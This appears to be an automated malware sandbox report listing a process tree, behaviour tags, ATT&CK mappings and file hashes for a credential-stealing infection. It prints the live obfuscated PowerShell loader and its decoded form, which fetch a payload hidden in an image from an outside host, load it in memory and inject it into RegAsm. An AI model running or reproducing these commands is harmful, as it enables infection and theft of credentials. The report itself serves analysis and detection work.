C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreNQDgTrevDgTreDkDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwByDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrewDgTreDQDgTreMQDgTrezDgTreDkDgTreOQDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre1DgTreDUDgTreLwDgTre5DgTreDkDgTreNwDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTrecgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMDgTreDgTre0DgTreDEDgTreMwDgTre5DgTreDkDgTreMwDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBCDgTreE0DgTreUgDgTrevDgTreG0DgTreYgBrDgTreC8DgTrecDgTreBwDgTreG0DgTreYQB4DgTreC8DgTreMwDgTrexDgTreDIDgTreLgDgTreyDgTreDYDgTreMQDgTreuDgTreDcDgTreNgDgTreuDgTreDMDgTreMDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBSDgTreE0DgTreQgDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BMR/mbk/ppmax/312.261.76.301//:ptth' , '1' , 'C:\ProgramData\' , 'RMB','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\RMB.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:2112

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:2164

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\utloenhmtxdshapijeamnsbd"
6⤵
PID:500

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\utloenhmtxdshapijeamnsbd"
6⤵
PID:2032

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\utloenhmtxdshapijeamnsbd"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:312

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fvrhfgzfgfwergdusonoqxwutydh"
6⤵
PID:2104

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fvrhfgzfgfwergdusonoqxwutydh"
6⤵
PID:908

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fvrhfgzfgfwergdusonoqxwutydh"
6⤵
- Accesses Microsoft Outlook accounts
PID:3012

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\pqwrfqkhunojturyjzipbkqdufuqeqj"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
711bd33cfb0f4f587e7e7cf0061bd2b7

SHA1
3022e28d1b49f9b327a033e3d9df85664c398f32

SHA256
bcaabe1b572ca56d0e5312be53188a7acd0b967238dd3ce639a441a8ef92954b

SHA512
2309e066d17175f36b2c745136b739d3bf99065ebc4b6269bd418ee1cebc06127a8b13b0a73a99b0929174d04a09812afbc95b0528fef428e0143ab6576608e2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
36ba9443a73d7f33951c908e5bca6518

SHA1
301fbf1293c653b049ca3e4eda131156721d97d4

SHA256
8e1c9c0e17a18473333b4a8937f84a4a1252037a00e277b071be274e9d2b8133

SHA512
a28a0270a1005af944eee0b670b1010d1ec602e3af5a580e23f8ebd3f5cc5bb963fd7e296a8d582935aeeb675123d4eb87111e0001ec4f04dc16591561887a56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1FB1.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1FC3.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar20F2.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\utloenhmtxdshapijeamnsbd

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
95a39c0ae74cb4ae60d37166eb01f4ac

SHA1
d2ba93d52eed9f293e71c8a447c2473950799556

SHA256
e5f49c9b591a0f59811ba3c86e3ea5f9d177f2bd03051476f2ea3a7800aaf274

SHA512
fbeec744eca84192e3e6d3099f6c37a3954151319983c537557998d527c283ccae26bc2b8b8ebb0c3c561590aea99b439e8ecbb387236daa477eb99e276993b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
02bdf8523be35fdc4ee03d92ccfa98ad

SHA1
c4382a6d0fdc94e743d5d1cb184d38cef4ca44a5

SHA256
e659981e83a08ad0b7c601a8af72bd99ee8ed0bd0cd82baf3f275524bfe4bbaa

SHA512
c142ccc30fcda494f44620560261e3303c03d7ee88585a5c61b904080a948350557ae2aa6ef1718a02d9ca3e8b140e7c61c66cd0fc32e606681872590d7eb434

Download Submit
C:\Users\Admin\AppData\Roaming\imaginepixelmediakiss.vbs

Filesize
402KB

MD5
bbe7fe42c4dcb5aeda55e077e99e6641

SHA1
4de2f7bd292f39fc3a01827144dedd42dd9b6f89

SHA256
635c980370b6300f0573205607658d335a7fc0dc9d864e0cb9ba671bfd7b4b31

SHA512
b703fe6f256d4067349514ad5d752d1a0f11adb5d58ff14c7df164389f4ccafdbe3ac78e564f46f8937d37733a1c408cdf82658a9b2a7e641f44348792626edf

Download Submit
memory/312-173-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/312-164-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/312-160-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/312-191-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/312-167-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/312-171-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/868-2-0x0000000070D5D000-0x0000000070D68000-memory.dmp

Filesize
44KB

Download
memory/868-115-0x0000000070D5D000-0x0000000070D68000-memory.dmp

Filesize
44KB

Download
memory/868-0-0x000000002F831000-0x000000002F832000-memory.dmp

Filesize
4KB

Download
memory/1684-122-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/1684-123-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1684-124-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/1684-125-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1684-128-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/1744-169-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1744-186-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1744-181-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1744-184-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1744-178-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1744-180-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1744-174-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1912-148-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/1912-35-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/1912-37-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

Filesize
256KB

Download
memory/1912-36-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

Filesize
256KB

Download
memory/1912-38-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/1912-121-0x000000006A230000-0x000000006A7DB000-memory.dmp

Filesize
5.7MB

Download
memory/2064-149-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-195-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2064-150-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-151-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-152-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-153-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-154-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-155-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-157-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-131-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-138-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-147-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-207-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-206-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-205-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-204-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2064-203-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-144-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-142-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-129-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-202-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2064-200-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2064-133-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
